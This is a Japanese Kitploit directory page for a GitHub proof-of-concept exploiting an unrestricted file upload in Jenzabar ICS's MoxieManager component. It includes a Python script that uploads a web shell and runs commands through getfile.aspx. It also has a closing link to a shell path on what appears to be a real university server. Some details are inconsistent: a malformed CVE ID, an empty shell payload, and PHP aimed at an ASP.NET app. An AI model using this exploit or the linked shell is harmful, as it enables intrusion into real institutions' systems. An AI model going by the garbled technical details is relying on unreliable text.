Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8(重大)Jenzabar ICS + MoxieManager 可能存在 RCE | Kitploit
ツール/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストペイロード開発
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8(重大)Jenzabar ICS + MoxieManager 可能存在 RCE

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8(重大)Jenzabar ICS + MoxieManager でRCEの可能性

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS 影響 影響を受ける製品 CVE-2026-30-03 9.8(重大) RCEの可能性 Jenzabar ICS + MoxieManager

Jenzabar ICS システムで使用される MoxieManager コンポーネントの脆弱性により、不適切なファイルアップロードが発生し、特定の条件下ではファイルが公開アクセス可能になり、リモートコード実行(RCE)につながる可能性があります。 技術的説明

この問題は以下が原因で発生します:

アップロードされたファイルの適切な検証の欠如

公開エンドポイントを介したファイル露出の可能性:

/ICS/staticpages/getfile.aspx

エンドポイントでの認証制御の不整合:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

特定のシナリオでは、アップロードされたファイルがアクセス可能なディレクトリに保存され、後で取得される可能性があります。

影響 任意のファイルアップロード 機密コンテンツの露出 リモートコード実行の可能性(サーバー設定に依存) システム全体の侵害

分類 CVSS v3.1: 9.8(重大) ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: 制限なしのファイルアップロード CWE-284: 不適切なアクセス制御

PoC Exploit

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

影響を受けるシステム(33以上確認済み)

修復策 即時対応(緩和策):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. getfile.aspx を制限する:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. MoxieManager のアップロードを無効化する

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

ツールをダウンロード